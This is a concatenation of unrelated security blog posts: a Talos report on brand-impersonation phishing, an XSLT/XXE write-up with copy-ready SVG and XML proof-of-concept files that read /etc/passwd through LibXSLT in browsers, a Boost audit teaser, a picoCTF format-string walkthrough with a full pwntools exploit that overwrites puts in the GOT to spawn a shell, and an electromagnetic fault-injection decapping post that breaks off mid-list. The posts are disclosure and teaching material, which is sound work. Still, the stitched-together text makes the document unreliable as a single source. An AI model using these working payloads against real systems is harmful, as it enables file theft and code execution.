Cisco recently developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.
Talos has discovered a wide range of techniques threat actors use to embed and deliver brand logos via emails to their victims.
Talos is providing new statistics and insights into detected brand impersonation cases over one month (March - April 2024).
In addition to deploying Cisco Secure Email, user education is key to detecting this type of threat.
Brand impersonation could happen on many online platforms, including social media, websites, emails and mobile applications. This type of threat exploits the familiarity and legitimacy of popular brand logos to solicit sensitive information from victims. In the context of email security, brand impersonation is commonly observed in phishing emails. Threat actors want to deceive their victims into giving up their credentials or other sensitive information by abusing the popularity of well-known brands.
Brand logo embedding and delivery techniques
Threat actors employ a variety of techniques to embed brand logos within emails. One simple method involves inserting words associated with the brand into the HTML source of the email. In the example below, the PayPal logo can be found in plaintext in the HTML source of this email.
Sometimes, the email body is base64-encoded to make their detection harder. The base64-encoded snippet of an email body is shown below.
The decoded HTML code is shown in the figure below. In this case, the Microsoft logo has been built via an HTML 2x2 table with four cells and various background colors.
A more advanced technique is to fetch the brand logo from remote servers at delivery time. In this technique, the URI of the resource is embedded in the HTML source of the email, either in plain text or Base64-encoded. The logo in the example below is fetched from the below address: hxxps://image[.]member.americanexpress[.]com/.../AMXIMG_250x250_amex_logo.jpg
Another technique threat actors use is to deliver the brand logo via attachments. One of the most common techniques is to only include the brand logo as an image attachment. In this case, the logo is normally base64-encoded to evade detection. Email clients automatically fetch and render these logos if they’re referenced from the HTML source of the email. In this example, the Microsoft logo is attached to this email as a PNG file and referenced in an <img> HTML tag.
In other cases, the whole email body, including the brand logo, is attached as an image to the email and is shown to the victim by the email client. The example below is a brand impersonation case where the whole body is included in the PNG attachment, named “shark.png”. Also, an “inline” keyword can be seen in the HTML source of this email. When Content-Disposition is set to "inline," it indicates that the attached content should be displayed within the body of the email itself, rather than being treated as a downloadable attachment.
A brand logo may also be embedded within a PDF attachment. In the example shown below, the whole email body is included in a PDF attachment. This email is a QR code phishing email that is also impersonating the Bluebeam brand.
The scope of brand impersonation
An efficient brand impersonation detection engine plays a key role in an email security product. The extracted information from correctly convicted emails is valuable for threat researchers and customers. Using Cisco Secure Email Threat Defense’s brand impersonation detection engine, we uncovered the true scope of how widespread these attacks are. All data reflects the period between March 22 and April 22, 2024.
Threat researchers can use this information to block future attacks, potentially based on the sender’s email address and domain, the originating IP addresses of brand impersonation attacks, their attachments, the URLs found from such emails, and even phone numbers.
The chart below demonstrates the top sender domains of emails curated by attackers to convince the victims to call a number (i.e., as in Telephone-Oriented Attack Delivery) by impersonating the Best Buy Geek Squad, Norton and PayPal brands. Free email services are widely used by adversaries to send such emails. However, other domains can also be found that are less popular.
Sometimes, similar brand impersonation emails are sent from a wide range of domains. For example, as shown in the below heatmap, emails impersonating the DocuSign brand were sent from two different domains to our customers on March 28. In other cases, emails are sent from a single domain (e.g., emails impersonating Geek Squad and McAfee brands).
Brand impersonation emails may target specific industry verticals, or they might be sent indiscriminately. As shown in the chart below, four brand impersonation emails from hotmail.com and softbased.top domains were sent to our customers that would be categorized as either educational or insurance companies. On the other hand, emails from biglobe.ne.jp targeted a wider range of industry verticals.
Cisco customers can also benefit from information provided by the brand impersonation detection engine. By sharing the list of the most frequently impersonated brands with them regularly, they can train their employees to stay vigilant when they observe specific brands in emails.
Microsoft was the most frequently impersonated brand over the month we observed, followed by DocuSign. Most emails that contained these brands were fake SharePoint and DocuSign phishing messages. Two examples are provided below.
Other top frequently impersonated brands such as NortonLifeLock, PayPal, Chase, Geek Squad and Walmart were mostly seen in callback phishing messages. In this technique, the attackers include a phone number in the email and try to persuade recipients to call that number, thereby changing the communication channel away from email. From there, they may send another link to their victims to deliver different types of malware. The attackers normally do so by impersonating well-known and familiar brands. Two examples of such emails are provided below.
Protect against brand impersonation
Strengthening the weakest link
Humans are still the weakest link in cybersecurity. Therefore, educating users is of paramount importance to reduce the amount and effects of security breaches. Educating people does not only concern employees within a specific organization but in this case, it also involves their customers.
Employees should know an organization’s trusted partners and the way that their organization communicates with them. This way, when an anomaly occurs in that form of communication, they will be able to identify any issues faster. Customers need different communication methods that your organization would use to contact them. Also, they need to be provided with the type of information you will be asking for. When they know these two vital details, they will be less likely to share their sensitive information over abnormal communication platforms (e.g., through emails or text messages).
Brand impersonation techniques are evolving in terms of sophistication, and differentiating fake emails from legitimate ones by a human or even a security researcher demands more time and effort. Therefore, more advanced techniques are required to detect these types of threats.
Asset protection
Well-known brands can protect themselves from this type of threat through asset protection as well. Domain names can be registered with various extensions to thwart threat actors attempting to use similar domains for malicious purposes. The other crucial step brands can take is to conceal their information from WHOIS records via privacy protection. Last, but not least, domain names need to be updated regularly since expired domains can be easily abused by threat actors for illicit activities that can harm your business reputation. Brand names should be registered properly so that your organization can take legal action when a brand impersonation occurs.
Advanced detection methods
Detection methods can be improved to delay the exposure of users to the received emails. Machine learning has improved significantly over the past few years due to advancements in computing resources, the availability of data, and the introduction of new machine learning architectures. Machine learning-based security solutions can be leveraged to improve detection efficacy.
Cisco Talos relies on a wide range of systems to detect this type of threat and protect our customers, from rule-based engines to advanced ML-based systems. Learn more about Cisco Secure Email Threat Defense's new brand impersonation detection tools here.
A year ago, I wondered what a malicious page with disabled JavaScript could do.
I knew that SVG, which is based on XML, and XML itself could be complex and allow file access. Is the Same Origin Policy (SOP) correctly implemented for all possible XML and SVG syntaxes? Is access through the file:// protocol properly handled?
Since I was too lazy to read the documentation, I started generating examples using ChatGPT.
XSL
The technology I decided to test is XSL. It stands for eXtensible Stylesheet Language. It’s a specialized XML-based language that can be used within or outside of XML for modifying it or retrieving data.
In Chrome, XSL is supported and the library used is LibXSLT. It’s possible to verify this by using system-property('xsl:vendor') function, as shown in the following example.
Here is the output of the system-properties.xml file, uploaded to the local web server and opened in Chrome:
The LibXSLT library, first released on September 23, 1999, is both longstanding and widely used. It is a default component in Chrome, Safari, PHP, PostgreSQL, Oracle Database, Python, and numerous others applications.
The first interesting XSL output from ChatGPT was a code with functionality that allows you to retrieve the location of the current document. While this is not a vulnerability, it could be useful in some scenarios.
<?xml-stylesheet href="get-location.xsl" type="text/xsl"?>
<!DOCTYPE test [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<test>
<getLocation test="ent"/>
</test>
Here is what you should see after uploading this code to your web server:
All the magic happens within the unparsed-entity-uri() function. This function returns the full path of the “ent” entity, which is constructed using the relative path “?”.
XSL and Remote Content
Almost all XML-based languages have functionality that can be used for loading or displaying remote files, similar to the functionality of the <iframe> tag in HTML.
I asked ChatGPT many times about XSL’s content loading features. The examples below are what ChatGPT suggested I use, and the code was fully obtained from it.
XML External Entities
Since XSL is XML-based, usage of XML External Entities should be the first option.
Using an edited ChatGPT output, I crafted an XSL file that combined the document() function with XML External Entities in the argument’s file, utilizing the data protocol. Next, I inserted the content of the XSL file into an XML file, also using the data protocol.
When I opened my XML file via an HTTP URL from my mobile phone, I was shocked to see my iOS /etc/hosts file! Later, my friend Yaroslav Babin(a.k.a. @yarbabin) confirmed the same result on Android!
Android + Chrome
Android + Chrome
Android + Chrome
Next, I started testing offline HTML to PDF tools, and it turned out that file reading works there as well, despite their built-in restrictions.
There was no chance that this wasn’t a vulnerability!
Here is a photo of my Smart TV, where the file reading works as well:
I compiled a table summarizing all my tests:
Test Scenario
Accessible Files
Android + Chrome
/etc/hosts
iOS + Safari
/etc/group, /etc/hosts, /etc/passwd
Windows + Chrome
–
Ubuntu + Chrome
–
PlayStation 4 + Chrome
–
Samsung TV + Chrome
/etc/group, /etc/hosts, /etc/passwd
The likely root cause of this discrepancy is the differences between sandboxes. Running Chrome on Windows or Linux with the --no-sandbox attribute allows reading arbitrary files as the current user.
Other Tests
I have tested some applications that use LibXSLT and don’t have sandboxes.
App
Result
PHP
Applications that allow control over XSLTProcessor::importStylesheet data can be affected.
XMLSEC
The document() function did not allow http(s):// and data: URLs.
Oracle
The document() function did not allow http(s):// and data: URLs.
PostgreSQL
The document() function did not allow http(s):// and data: URLs.
The default PHP configuration disables parsing of external entities XML and XSL documents. However, this does not affect XML documents loaded by the document() function, and PHP allows the reading of arbitrary files using LibXSLT.
According to my tests, calling libxml_set_external_entity_loader(function ($a) {}); is sufficient to prevent the attack.
POCs
You will find all the POCs in a ZIP archive at the end of this section. Note that these are not zero-day POCs; details on reporting to the vendor and bounty information will be also provided later.
First, I created a simple HTML page with multiple <iframe> elements to test all possible file read functionalities and all possible ways to chain them:
The result of opening the xxe_all_tests/test.html page in an outdated Chrome
Open this page in Chrome, Safari, or Electron-like apps. It may read system files with default sandbox settings; without the sandbox, it may read arbitrary files with the current user’s rights.
As you can see now, only one of the call chains leads to an XXE in Chrome, and we were very fortunate to find it. Here is my schematic of the chain for better understanding:
Next, I created minified XML, SVG, and HTML POCs that you can copy directly from the article.
poc.svg
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE svg [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<svg location="ent" />
poc.xml
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?>
<!DOCTYPE test [
<!ENTITY ent SYSTEM "?" NDATA aaa>
]>
<test1 location="ent"/>
TL;DR Shielder, with OSTIF and Amazon Web Services, performed a Security Audit on a subset of the Boost C++ libraries. The audit resulted in five (5) findings ranging from low to medium severity plus two (2) informative notices. The Boost maintainers of the affected libraries addressed some of the issues, while some other were acknowledged as accepted risks.
Today, we are publishing the full report in our dedicated repository.
Introduction In December 2023, Shielder was hired to perform a Security Audit of Boost, a set of free peer-reviewed portable C++ source libraries.
This blogpost covers a Capture The Flag challenge that was part of the 2024 picoCTF event that lasted until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place in the global scoreboard. I decided to try and focus on the binary exploitation challenges. While having followed Corelan’s Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.
The challenge covers a format string vulnerability. This is a type of vulnerability where submitted data of an input string is evaluated as an argument to an unsafe use of e.g., a printf() function by the application, resulting in the ability to read and/or write to memory. The format string 3 challenge provides 4 files:
The vulnerable binary format-string-3 (download link)
The vulnerable binary source code format-string-3.c (download link)
A dynamic linker as the interpreter ld-linux-x86-64.so.2 (download link)
These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.
The steps of the final exploit:
Fetch the address of the setvbuf function in libc. This is actually provided by the vulnerable binary itself via a puts() function to simulate an information leak printed to stdout,
Dynamically calculate the base address of the libc library,
Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.
For step 2, it’s important to calculate the address dynamically (vs statically/hardcoded) since we can validate that the remote target loads modules at different addresses every time it’s being run. We can verify this by running the binary multiple times, which provides different memory addresses each time it is being run. This is due to the combination of Address Space Layout Randomization (ASLR) and the Position Independent Executable (PIE) compiler flag. The latter can be verified by using readelf on our binary since the binary is provided as part of the challenge.
Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.
Vulnerability Details
Background on string formatting
The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is directly passed and used as arguments to functions such as the C library’s printf() and its variants:
Even with input validation in place, passing input directly to one of these functions (think: printf(input)) should be avoided. It’s recommended to use placeholders and string formatting such as printf("%s", input) instead.
The impact of a format string vulnerability can be divided in a few categories:
Ability to read values on the stack
Arbitrary memory reads
Arbitrary memory writes
In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.
Background on Global Offset Table
Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries – almost any binary running on a modern system.
The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.
When an executable is programmed in C to call function and is compiled as an ELF executable, the function will be compiled as function@plt. When the program is executed, it will jump to the PLT entry of function and:
If there is a GOT entry for function, it jumps to the address stored there;
If there is no GOT entry, it will resolve the address and jump there.
An example of the first option, where there is a GOT entry for function, is depicted in the visual below:
During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the program’s execution to arbitrary locations, such as shellcode or other parts of memory under our control.
Reviewing the source code
We are provided with the following source code:
#include<stdio.h>#define MAX_STRINGS 32char *normal_string = "/bin/sh";voidsetup() {setvbuf(stdin, NULL, _IONBF, 0);setvbuf(stdout, NULL, _IONBF, 0);setvbuf(stderr, NULL, _IONBF, 0);}voidhello() {puts("Howdy gamers!");printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);}intmain() {char *all_strings[MAX_STRINGS] = {NULL};charbuf[1024] = {'\0'};setup();hello(); fgets(buf, 1024, stdin); printf(buf);puts(normal_string);return0;}
C
Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:
# Making both the executable & linker executablechmodu+xformat-string-3ld-linux-x86-64.so.2# Executing the binary./format-string-3Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7f7c778eb3f0# This is our input, ending with <enter>testtest/bin/sh
Bash
We note a couple of things:
The binary provides us with the memory address of the setvbuf function in the libc library,
We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,
The program finishes with a puts() function call that writes /bin/sh to stdout.
This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.
Vulnerability #1: Memory Leak
If we take another look at the source code above, we notice the following line in the hello() function:
printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
C
Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. If not, we would have to deal with finding an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.
We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.
Vulnerability #2: Format String Vulnerability
In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the puts(buf) function call. In an excellent paper that can be found here, we learned that we can use format specifiers in C to:
Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),
Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,
Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m. Then, we can write the output counter value to memory using %n, again if we provide the memory address correctly as part of our input string.
Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:
# Executing the binary./format-string-3Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7f2818f423f0# This is our input, ending with <enter>%p# This is the output of the printf(buf) function call# This now prints back a value as a pointer0x7f28190a0963/bin/sh
Bash
The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!
Exploitation
We are now armed with an information leak that provides us a memory address and a format string vulnerability. Let’s try and combine these two to get code execution on our remote system.
Calculating input string offset
Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?
Let’s first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:
Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7fa5ae99b3f0AAAAAAAA%2$pAAAAAAAA0xfbad208b/bin/sh
Bash
Ideally (we’re explaining why later), we have a format specifier %n$p where n is an offset to point exactly at the start of our input string. You can do this manually (%p, %2$p, %3$p…) until %p points to your input string, but I did this using gdb:
# Open the program in gdbgdbformat-string-3# Put a breakpoint at the puts functionbputs# Run the programr# Continue the program since it will hit the breakpoint # on the first puts call in our program (Howdy Gamers !)c# Provide our input AAAAAAAA followed by <enter>AAAAAAAA
Bash
The program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50×8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:
You could assume that 33 is the offset we need, but there’s a catch:
On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.
This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:
The offset displayed on top of the visual indicates the relative offset from the start of the stack.
This offset now points exactly to the start of our input string:
Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7ff5ed4873f0AAAAAAAA%38$pAAAAAAAA0x4141414141414141/bin/sh
Bash
AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.
Now the (probably) more critical question to understand the answer to: why does it matter that we know how to point to our input string in memory? Up until this point, we have only been reading our own string in memory. What will happen when we replace our %p format specifier to read, to the %n format specifier?
Howdygamers!OkayI'll be nice. Here'stheaddressofsetvbufinlibc:0x7f4bfd3ff3f0AAAAAAAA%38$nzsh:segmentationfault./format-string-3
Bash
We get a segmentation fault. What is going on? Our input string now tries to write the value of the output counter to the memory address we were pointing to before with %p, which is… our input string itself.
This means we now have control over where we can write values since we control the input string. We can also modify what we are writing to memory as long as we can control the output counter. We also have control over this, as explained before:
Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.
By changing the format specifier, we now executed the following:
To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.
In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mapped…). In the next part, we’re going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.
Local Exploitation
Let’s take a step back and think what we logically need to do. We need to:
Fetch the address of our setvbuf function in the libc library, provided by the program,
From this address, calculate the base address of libc,
Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,
Continue execution to give control to the operator.
We are going to use the popular pwntools library for Python 3 to help us out quite a bit.
First, let’s attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:
from pwn import *p = process("./format-string-3")info(p.recvline()) # Fetch Howdy Gamers!info(p.recvuntil("libc: ")) # Fetch line right before setvbuffer address# Get setvbuffer addressbytes_setvbuf_address = p.recvline()# Convert output bytes to integer to store and work with our addresssetvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(),16)info("Received setvbuf address leak: %s", hex(setvbuf_leak))
Python
### Sample Output[+] Starting local process './format-string-3': pid 216507[*] Howdy gamers![*] Okay I'll be nice. Here's the address of setvbuf in libc: [*] Received setvbuf address leak: 0x7fb19acc83f0[*] Stopped process './format-string-3' (pid216507)
Bash
Second, we manually load libc to be able to set its base address to match our (now local, but future remote) target libc base address. We do this by subtracting the setvbuf function address from our manually loaded libc from our leaked function address:
...libc = ELF("./libc.so.6")info("Calculating libc base address...")libc.address = setvbuf_leak - libc.symbols['setvbuf']info("libc base address: %s", hex(libc.address))
Python
### Sample Output[+] Starting local process './format-string-3': pid 219013[*] Howdy gamers![*] Okay I'll be nice. Here's the address of setvbuf in libc: [*] Received setvbuf address leak: 0x7f25a21de3f0[*] Calculating libc base address...[*] libc base address: 0x7f25a2164000[*] Stopped process './format-string-3' (pid219013)
Bash
Finally, we can utilize the fmstr_payload function of pwntools to easily write:
What: the system function address in libc
Where: the puts entry in the GOT of our binary
Before actually executing and sending our payload, let’s make sure we understand what’s happening. We start by noting down the addresses of:
the system function address in libc (0x7f852ddca760)
the puts entry in the GOT of our binary (0x404018)
next to the payload we are going to send in an interactive Python prompt, for demonstration purposes:
You can divide the payload in different blocks, each serving the purpose we expected, although it’s quite a step up from what we’ve manually done before. We can identify the pattern %mc%n$hhn (or ending lln), which:
Increases the output counter with m (note that the output counter does not necessarily start at 0)
Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.
Let’s now analyze the payload and calculate ourselves for 1 write operation to understand how the payload works. We have %96c%47$lln as the first block of our payload, which can be logically seen as a write operation. This:
Increases the output counter with 96h (hex) or 150d (decimal)
Writes the current value of the output counter (n, truncated by a long long (ll), or 8 bytes, to the memory address specified at offset 42:
As you can see in the payload above, offset 42 will correspond with \x18@@\x00\x00\x00\x00\x00, which is further down our payload. @ is \x40 in hex, so our target address matches the value for the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.
You’ll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since we’re working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.
After writing, the payload will continue with processing the next block %31c%48$hhn, which again increases the output counter and writes to the next offset (43). This offset contains our next address. The payload will continue until 6 blocks are executed, which corresponds to 6 %…%n statements.
Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:
...elf = context.binary = ELF('./format-string-3')info("Creating format string payload...")payload = fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})# Ready to send payload!info("Sending payload...")p.sendline(payload)p.clean()# Give control to the shell to the operatorinfo("Payload successfully sent, enjoy the shell!")p.interactive()
Python
The fmtstr_payload function really does a lot of heavy lifting for us combined with the elf and libc references. It effectively writes the complete address of libc.symbols[‘system’] to the location where elf.got[‘puts’] originally was in memory by precisely modifying the output counter and executing memory write operations.
### Sample Output[+] Starting local process './format-string-3': pid 227263[*] Howdy gamers![*] Okay I'll be nice. Here's the address of setvbuf in libc: [*] Received setvbuf address leak: 0x7fa7c29473f0[*] '/home/kali/picoctf/libc.so.6'[*] Calculating libc base address...[*] libc base address: 0x7fa7c28cd000[*] '/home/kali/picoctf/format-string-3'[*] Creating format string payload...[*] Sending payload...[*] Payload successfully sent, enjoy the shell![*] Switching to interactive mode$whoamikali
Bash
We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!
Remote Exploitation
Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:
Note that you’ll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.
### Sample Output...[*] Payload successfully sent, enjoy the shell![*] Switching to interactive mode$ ls flag.txtflag.txt
Python
That concludes the exploit, after which we can submit our flag. In a real world scenario, getting this kind of remote code execution would clearly be a great risk.
Conclusion
The preceding challenges that lead up to this challenge (format string 0, 1, 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic to me, this was a great way to practice these types of vulnerabilities during a fun event.
Format string vulnerabilities are less common than they used to be, however, our IoT colleagues assured me they encountered some recently during an IoT device assessment.
That’s why it’s important to adhere to:
Input Validation
Limit User-Controlled Input
Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities
Secure Coding Practices
This should greatly limit the risk of format string vulnerabilities still being present in current day applications.
Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISO’s Red Team forward to deliver even better advisory to its clients.
Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.
Recently, the automotive VR team has undertaken an effort to reproduce the software extraction attack against one of the target devices used during the Automotive Pwn2Own 2024 held in Tokyo, Japan. The electromagnetic fault injection (EMFI) approach was chosen to attempt an attack against the existing readout protection mechanisms. This blog post details preparatory steps to speed up the attack, hopefully considerably.
Electromagnetic fault injection
In general, fault injection attacks against hardware attempt to produce some sort of gain for an attacker by injecting faults into a device under attack by manipulating clock pulses, supply voltages, temperature, electromagnetic fields around the device, and aiming short light pulses at certain locations on the device. Of these vectors, EMFI stands out as probably the only attack approach that requires close to no modifications of the device under attack, with all action being conducted at a quite short distance. The attack then proceeds by moving an EM probe above the device in very small increments and triggering an EM pulse. With any luck, this would disturb the normal operation of the device under attack in just the right way to cause the desired effect.
Practically speaking, some sort of an EM pulse tool is required to conduct the attack. In this case, the PicoEMP was chosen for that purpose, which has been mounted on a modified 3D printer carriage.
Figure 1 - The ChipSHOUTER-PicoEMP
However, the device in question (a GD32F407Z by GigaDevice) is physically rather large, with the package measuring 20mm by either side. Considering how long each individual attempt runs, the fact that the attempt needs to be retried multiple times to collect meaningful outcome statistics, and rather small increments used to move the probe, it would make sense to narrow down the search area as much as possible. Injecting EM faults into the epoxy encapsulation would not bring much of an effect.
Decapping
Unfortunately, the encapsulation is not transparent and does not allow for easy visual identification of the die in the package. This means that some way of getting the die out is required to measure it, or better yet, leave the die in the package so it will be possible to measure both the die dimensions and the position of the die within the package.
There are multiple approaches to decapsulation, or decapping for short:
· Mechanical: sanding or milling the package, cracking the encapsulation when heated · Chemical: applying acid to dissolve encapsulation · Thermal: placing the package in a furnace to burn encapsulation away · Optical: using a laser to burn encapsulation away in a precise manner
Of these, many require specialized equipment (mill, laser, furnace, fume hood for nitric acid), are time-consuming (sanding), or do not preserve important information (cracking the package). The choice was thus limited to what was available: hot sulfuric acid.
DANGER: Hot sulfuric acid is extremely corrosive; avoid spilling and wear proper PPE at all times.
DANGER: Sulfuric acid vapors are extremely corrosive; avoid inhaling and work in a well-ventilated area (fume hood or outside).
NOTE: Study relevant safety information including but not limited to materials handling, spill containment, and clean-up procedures before working with any hazardous chemicals.
NOTE: This blog post was written purely for educational purposes; any attempts to replicate the work are at your own risk.
Decapping process
As my home lab is, sadly, not equipped with a fume hood, all work was conducted outside.
Figure 2 - Example of tools used
The following tools were used:
